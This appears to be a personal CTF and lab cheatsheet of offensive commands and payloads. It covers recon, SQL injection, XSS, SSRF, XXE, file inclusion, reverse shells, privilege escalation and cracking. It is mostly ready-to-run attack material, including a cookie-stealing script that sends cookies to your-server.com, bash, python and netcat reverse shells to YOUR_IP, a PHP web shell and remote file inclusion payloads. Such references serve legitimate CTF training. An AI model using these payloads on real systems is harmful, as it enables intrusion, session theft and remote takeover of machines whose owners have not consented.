CTF Cheatsheet – Hacking Reference

CTF Cheatsheet
Personal reference for commands, payloads and techniques used in CTFs and labs.

Platforms:
- HackTheBox
- TryHackMe
- PicoCTF
- CTFtime

======================================================================

RECON AND ENUMERATION

Nmap

Fast scan:
nmap -T4 -F <IP>

Full TCP + version + scripts:
nmap -sV -sC -p- -T4 <IP> -oN nmap_full.txt

UDP top ports:
nmap -sU --top-ports 200 <IP>

Vuln scripts:
nmap --script vuln <IP>

OS detection:
nmap -O -sV <IP>

----------------------------------------------------------------------

Directory Busting

gobuster:
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50

ffuf:
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,301,302

feroxbuster recursive:
feroxbuster -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

----------------------------------------------------------------------

Subdomain Enumeration

subfinder:
subfinder -d example.com -o subs.txt

gobuster vhost:
gobuster vhost -u http://example.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

dnsrecon:
dnsrecon -d example.com -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

amass:
amass enum -passive -d example.com

----------------------------------------------------------------------

SMB

Enum shares:
smbclient -L //<IP> -N
smbmap -H <IP>

Connect:
smbclient //<IP>/share -N

Enum users and info:
enum4linux -a <IP>
crackmapexec smb <IP>

----------------------------------------------------------------------

SNMP

snmpwalk -c public -v2c <IP>

onesixtyone:
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP>

======================================================================

WEB EXPLOITATION

Common Tools

Burp Suite proxy:
export http_proxy=http://127.0.0.1:8080
export https_proxy=http://127.0.0.1:8080

curl with cookies:
curl -b "session=abc123" http://<IP>/admin

nikto:
nikto -h http://<IP>

wfuzz:
wfuzz -c -z file,wordlist.txt --hc 404 http://<IP>/FUZZ

----------------------------------------------------------------------

JWT

Decode:
echo "eyJ..." | base64 -d

Crack with hashcat:
hashcat -a 0 -m 16500 <token> wordlist.txt

None algorithm attack:
Set alg to "none" and remove signature

----------------------------------------------------------------------

SSRF

Basic:
http://localhost/admin
http://127.0.0.1:22
http://169.254.169.254/latest/meta-data/

Bypass filters:
http://0x7f000001/
http://127.1/
http://2130706433/

----------------------------------------------------------------------

XXE

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

======================================================================

SQL INJECTION

Detection

'
''
`
``
,
"
""
//
//
\
\\
;
' or '1'='1
' or 1=1--
" or 1=1--

----------------------------------------------------------------------

Union-Based

Find columns:
' ORDER BY 1--
' ORDER BY 2--

Find injectable column:
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--

Extract data:
' UNION SELECT username,password FROM users--

MySQL version:
' UNION SELECT @@version--

Tables:
' UNION SELECT table_name FROM information_schema.tables--

----------------------------------------------------------------------

Blind Boolean

' AND 1=1--   (true)
' AND 1=2--   (false)
' AND SUBSTRING(username,1,1)='a'--

----------------------------------------------------------------------

Time-Based Blind

MySQL:
'; IF(1=1, SLEEP(5), 0)--

PostgreSQL:
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--

MSSQL:
'; IF 1=1 WAITFOR DELAY '0:0:5'--

----------------------------------------------------------------------

sqlmap

Basic:
sqlmap -u "http://<IP>/page?id=1" --dbs

With cookie:
sqlmap -u "http://<IP>/page" --cookie="session=abc" --dbs

POST data:
sqlmap -u "http://<IP>/login" --data="user=a&pass=b" --dbs

Dump table:
sqlmap -u "http://<IP>/?id=1" -D dbname -T users --dump

OS shell:
sqlmap -u "http://<IP>/?id=1" --os-shell

======================================================================

CROSS-SITE SCRIPTING

Basic Payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
"><script>alert(1)</script>
'><script>alert(1)</script>

----------------------------------------------------------------------

Filter Bypass

<ScRiPt>alert(1)</sCrIpT>
<img src=x onerror="alert`1`">
<svg/onload=alert(1)>
javascript:alert(1)
<iframe src="javascript:alert(1)">

----------------------------------------------------------------------

Cookie Stealing

<script>
document.location='http://your-server.com/?c='+document.cookie
</script>

----------------------------------------------------------------------

XSS to CSRF

<script>
fetch('/admin/delete?id=1', {method:'POST', credentials:'include'})
</script>

======================================================================

FILE INCLUSION AND PATH TRAVERSAL

LFI

/etc/passwd
/etc/shadow
/proc/self/environ
/var/log/apache2/access.log

Traversal:
../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
....//....//etc/passwd

----------------------------------------------------------------------

PHP Wrappers

php://filter/convert.base64-encode/resource=index.php
php://input
data://text/plain;base64,...
expect://id

----------------------------------------------------------------------

RFI

?page=http://your-server.com/shell.txt
?page=\\your-server.com\shell.txt

======================================================================

REVERSE SHELLS

Setup Listener

nc -lvnp 4444
rlwrap nc -lvnp 4444

----------------------------------------------------------------------

Bash

bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

----------------------------------------------------------------------

Python

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("YOUR_IP",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

----------------------------------------------------------------------

PHP

<?php system($_GET['cmd']); ?>

----------------------------------------------------------------------

Netcat

nc -e /bin/sh YOUR_IP 4444

----------------------------------------------------------------------

PowerShell

powershell reverse shell payload...

======================================================================

PRIVILEGE ESCALATION LINUX

Enumeration

id
whoami
groups

SUID binaries:
find / -perm -4000 -type f 2>/dev/null

Writable files:
find / -writable -type f 2>/dev/null | grep -v proc

Cron jobs:
cat /etc/crontab

Sudo rights:
sudo -l

Capabilities:
getcap -r / 2>/dev/null

----------------------------------------------------------------------

Automated Enum

linpeas:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

LinEnum:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh && bash LinEnum.sh

----------------------------------------------------------------------

GTFOBins

sudo vim:
sudo vim -c ':!/bin/bash'

sudo find:
sudo find . -exec /bin/bash \; -quit

======================================================================

PRIVILEGE ESCALATION WINDOWS

systeminfo
whoami /all
net user
net localgroup administrators

======================================================================

CRYPTOGRAPHY

Hashing

hash-identifier <hash>
hashid <hash>

MD5:
hashcat -a 0 -m 0 hash.txt wordlist.txt

SHA1:
hashcat -a 0 -m 100 hash.txt wordlist.txt

SHA256:
hashcat -a 0 -m 1400 hash.txt wordlist.txt

----------------------------------------------------------------------

Classic Ciphers

ROT13:
echo "text" | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Base64 decode:
echo "dGVzdA==" | base64 -d

Hex decode:
echo "74657374" | xxd -r -p

======================================================================

STEGANOGRAPHY

file image.jpg
exiftool image.jpg
strings image.jpg | less

steghide:
steghide extract -sf image.jpg

zsteg:
zsteg image.png

======================================================================

FORENSICS

binwalk -e file.jpg

foremost:
foremost -i image.dd -o output/

volatility:
vol.py -f memory.dmp windows.pslist

wireshark:
wireshark capture.pcap

======================================================================

BINARY EXPLOITATION

checksec --file=binary
file binary
strings binary | grep -i flag

gdb ./binary
run
info functions
disas main

======================================================================

PASSWORD CRACKING

hashcat:
hashcat -a 0 -m <mode> hashes.txt rockyou.txt

john:
john hash.txt --wordlist=rockyou.txt

======================================================================

OSINT

Google dorks:

site:example.com
filetype:pdf site:example.com
inurl:admin site:example.com
intitle:"index of" site:example.com

theHarvester:
theHarvester -d example.com -b google,bing,linkedin

shodan:
shodan search "hostname:example.com"

======================================================================

USEFUL ONE-LINERS

Find SUID files:
find / -perm -4000 2>/dev/null

Search for passwords:
grep -r "password" /var/www/ 2>/dev/null

Port scan with bash:
for p in {1..1024}; do (echo >/dev/tcp/IP/$p) 2>/dev/null && echo "$p open"; done

Serve files:
python3 -m http.server 8080

======================================================================

USEFUL TOOLS

nmap                Port scanning
gobuster / ffuf     Directory and subdomain brute force
sqlmap              SQL injection
burpsuite           Web proxy and testing
metasploit          Exploitation framework
hashcat / john      Password cracking
wireshark / tshark  Packet analysis
volatility          Memory forensics
binwalk             Firmware and file extraction
pwntools            Binary exploit development
ghidra / ida        Reverse engineering
impacket            Windows and AD attacks

======================================================================

RESOURCES

GTFOBins
https://gtfobins.github.io

HackTricks
https://book.hacktricks.xyz

PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings

RevShells
https://www.revshells.com

CyberChef
https://gchq.github.io/CyberChef

dcode.fr
https://www.dcode.fr

Exploit-DB
https://www.exploit-db.com

======================================================================

For authorized testing only.
